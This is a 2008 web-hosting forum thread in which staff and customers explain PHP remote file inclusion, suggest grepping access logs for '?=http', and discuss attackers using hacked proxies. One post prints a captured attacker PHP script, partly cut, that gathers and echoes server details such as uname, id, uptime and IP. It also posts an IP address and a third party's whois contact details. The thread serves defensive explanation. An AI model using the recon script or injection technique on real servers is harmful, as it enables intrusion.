| 
8th June 2008, 11:53 AM
|
#2 (permalink)
| | Administrator
Join Date: Oct 2002 Location: London, UK
Posts: 8,103
| Most attacks do not necessarily have anythin to do with a comments script.
Any php script at all is at risk. 1 line of insecure code can lead to someone being able to inject malicious code into the page and execute it as your sites user. It does not have to be a comment or email script in order for someone to achieve this, just poor or insecure coding of any type.
__________________ . Matt
UnitedHosting Staff For official support please use our helpdesk at UnitedSupport.co.uk UnitedHosting proudly hosting more than 20,000 sites since 1998. | 
|  | |
8th June 2008, 11:56 AM
|
#3 (permalink)
| | Registered User
Join Date: Mar 2005
Posts: 148
| By php script, you mean client-side PHP, right? | |
| | |
8th June 2008, 12:05 PM
|
#4 (permalink)
| | Administrator
Join Date: Oct 2002 Location: London, UK
Posts: 8,103
| I mean by legitimate php scripts installed to someone such as yourselves web hosting account.
Should something on that script be insecure, or out-dated, then it would likely be found and abused by a hacker to inject malware or spam scripts into your hosting account and executed.
__________________ . Matt
UnitedHosting Staff For official support please use our helpdesk at UnitedSupport.co.uk UnitedHosting proudly hosting more than 20,000 sites since 1998. | |
| | |
8th June 2008, 01:20 PM
|
#5 (permalink)
| | Registered User
Join Date: Mar 2005
Posts: 148
| Sorry for being so ignorant...
So, I would have to have a PHP script in my client-side page code, which would send requests to the PHP script on the server, and that could then be abused?
If there is no server-side PHP "receiver" then I'm safe? | |
| | |
8th June 2008, 01:39 PM
|
#6 (permalink)
| | Registered User
Join Date: Feb 2006 Location: London, UK
Posts: 263
| php is a server side script language and does not run on client side. basically if your site on the server does not use any php script at all then you do not need to be concerned about any php hack. full stop.
php would only causing harm on the server, whereas client-side scripting languange such as javascript could cause harm to a user's local pc.
Php is not the only website scripting language that could be open to abuse, in fact no one can say any language is 100% secure and hack-free - it is a matter that the loophole has not been discovered as yet. there is always someone out there looking for these loopholes either to exploit (bad guys), or to plug (good guys). It is something we will have to live with just like all the evil things in a socienty. | |
| | |
8th June 2008, 03:51 PM
|
#7 (permalink)
| | Registered User
Join Date: Mar 2005
Posts: 148
| If I have a page which contains a PHP include (file) statement, that runs entirely on the server, and does not even appear in the client's browser source, right?
Is this then, somehow, vulnerable?
What is an example of a PHP vulnerability, if the client-side web page does not access PHP on the server?
Is "enabling" PHP on the server enough to make your site vulernable? How? | |
| | |
8th June 2008, 04:23 PM
|
#8 (permalink)
| | Registered User
Join Date: Feb 2006 Location: London, UK
Posts: 263
| in order to exploit an php vul., you would normally need to use a specially crafted url which would result in some scripts (mysql query for example) being executed on the server that hosts the website that uses php as its scripting language. real world examples include stealing customer data. if your site does not use mysql then there no worry about this type of hack. another could be writing or attaching some scripts at the end of a php file on the server but o dont think this is likely to happen on UH servers due to strict write permissions.
php only runs on the server using the php engine on the server, which generates the html code and send it to the client's browser so that it can display it. No browser understands php. | |
| | |
8th June 2008, 08:33 PM
|
#9 (permalink)
| | Administrator
Join Date: Oct 2002 Location: London, UK
Posts: 8,103
| One of the most common examples is where people use url's on their site such as this: www.mysitenamehere.com/page.php=index
and www.mysitenamehere.com/page.php=aboutus
If the underlying code does not sanitise the input here then hackers simply need to hit in a browser something like: http://www.mysitenamehere.com/page.p.../badscript.php
Thus injecting the badscript.php code into the mysitenamehere.com web server and executing it by visiting that page in a browser.
Thats the simplest most common example I can come up with. Remember page.php seems harmless and is not an email or contact script, yet it has been made insecure and dangerous.
__________________ . Matt
UnitedHosting Staff For official support please use our helpdesk at UnitedSupport.co.uk UnitedHosting proudly hosting more than 20,000 sites since 1998. | |
| | |
8th June 2008, 08:59 PM
|
#10 (permalink)
| | Registered User
Join Date: Sep 2007 Location: 17°59′N 76°48′W
Posts: 150
| Quote:
Originally Posted by UH-Matt  | Thanks for the great example Matt! | |
| | |
11th June 2008, 12:55 AM
|
#11 (permalink)
| | Registered User
Join Date: Feb 2006 Location: London, UK
Posts: 263
| I just caught one real life example today - a utter stupid person may just learn something from here and tried to get his hand dirty (except that he did not get what he wanted): the robot.txt is in fact a php file trying to steal some server info: PHP Code: <?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "^bryan_ae1^<br>";
$un = @php_uname();
$up = system(uptime);
...
echo "bryan_ae1 was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
?> that person was using a London based IP:62.128.131.80
who obviously had access to the site freelance.eu, the details of which is: Quote:
Domain Name freelance
Status REGISTERED (What this means)
Registered July 17, 2006
Last update July 17, 2006, 10:19 am
Registrant
Name P.J.H. van Lier
Organisation NL Hosting Internet BV
Language Dutch
Address
Phone +31.645422166
Email admin@nlhosting.com
Registrant technical contacts
Name P.J.H. van Lier
Organisation NL Broadband Internet B.V.
Language Dutch
Address
Phone
Fax
Email
Registrar technical contacts
Name P.J.H. van Lier
Organisation NL Broadband Internet B.V.
Language Dutch
Address
Phone
Fax
Email
Registrar
Organisation NL Broadband Internet B.V.
Website Broadband.nl - .....
Nameservers
ns.nlhosting.net
ns1.nlhosting.net
| maybe UH could make a complaint to that hosting company?
Last edited by pursuit : 11th June 2008 at 01:12 AM.
Reason: i had a second thought and deleted part of the php code.
| |
| | |
11th June 2008, 01:10 AM
|
#12 (permalink)
| | Administrator
Join Date: Oct 2002 Location: London, UK
Posts: 8,103
| If we complained about every attempt that was made we would be complaining 1000 times a day. Those involved soon find out quickly enough.
These things are literally occuring thousands of times a day across our IP ranges, its very very common.
A good way to find them is to grep your sites access log for:
?=http
This will show up any access lines like the example provided.
__________________ . Matt
UnitedHosting Staff For official support please use our helpdesk at UnitedSupport.co.uk UnitedHosting proudly hosting more than 20,000 sites since 1998. | |
| | |
11th June 2008, 08:43 AM
|
#13 (permalink)
| | Registered User
Join Date: Feb 2006 Location: London, UK
Posts: 263
| probably not worth it for all such (illegal) activities, not even this case where the hacking script is hosted by the Dutch. had it been in the UK I would personally make a complaint because this could amount to criminal offense under UK law for the parties involed - the hacker, the hosting company of the hacking scripts and even the ISP (the last two if notified but fail to take action).
the stupidity of this case is that the person seems to act like a burglar who leavse his name/address at the crime scene. | |
| | |
11th June 2008, 08:47 AM
|
#14 (permalink)
| | Administrator
Join Date: Oct 2002 Location: London, UK
Posts: 8,103
| Quote: |
the stupidity of this case is that the person seems to act like a burglar who leavse his name/address at the crime scene.
| Not really, thats why I was going to suggest you remove some of that information.
There is a very high chance that the IP used for the hack is actually just another hacked IP that the hacker is using as a proxy.
They link up 5, or 10, or 15 different hacked systems and proxy via each one to hack further IP's. This hides their steps and reduces the chance of being caught, while adding to the number of hacked systems they have access to.
The IP they used to attempt to hack your site is probably another innocent site or persons broadband connection, who happened to actually have a vulnerability to allow the hacker in, and now the hacker is running the same hack scans from that hacked connection.
__________________ . Matt
UnitedHosting Staff For official support please use our helpdesk at UnitedSupport.co.uk UnitedHosting proudly hosting more than 20,000 sites since 1998. | |
| | |
11th June 2008, 10:18 AM
|
#15 (permalink)
| | Registered User
Join Date: Feb 2006 Location: London, UK
Posts: 263
| i was referring to the freelance.eu site that the hacking script was hosted, unless that site had been hacked in which case i think maybe i could do them (the hosting company) a favour to let them know.
yes i knew the ip seemed to be from London but the ISP (host) was a French one, an indication what Matt said. I log this info on selected sites, not for this purpose though. | |
| | |
11th June 2008, 10:22 AM
|
#16 (permalink)
| | Administrator
Join Date: Oct 2002 Location: London, UK
Posts: 8,103
| Yes even the hosting account that the hacking script is hosted on is likely a hacked account.
Once they had managed to place a script onto your space, the next site they try to hack would likely do a call to your own site with that script and so on and so on...
__________________ . Matt
UnitedHosting Staff For official support please use our helpdesk at UnitedSupport.co.uk UnitedHosting proudly hosting more than 20,000 sites since 1998. | |
| | |
23rd July 2008, 12:00 PM
|
#17 (permalink)
| | Registered User
Join Date: Jul 2008
Posts: 37
| I was recently alerted to a possible compromise on one of the sites belonging to Harper Collins, the publishers. I use Kaspersky, went to check and the page in question triggered off a trojan downloader alert. Upon investigation, there was indeed javascript code within that page that contained the malware that shouldn't have been there. I contacted their IT department, and within a few hours the exploit had been removed.
So yes, legitimate sites can hold malware, but I think that's more to do with how secure those servers/sites are in the first place. | |
| | |
Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | | | | Thread Tools | | | | Display Modes | Rate This Thread |  Linear Mode | | 
Posting Rules
| You may not post new threads You may not post replies You may not post attachments You may not edit your posts
HTML code is Off | | | | |
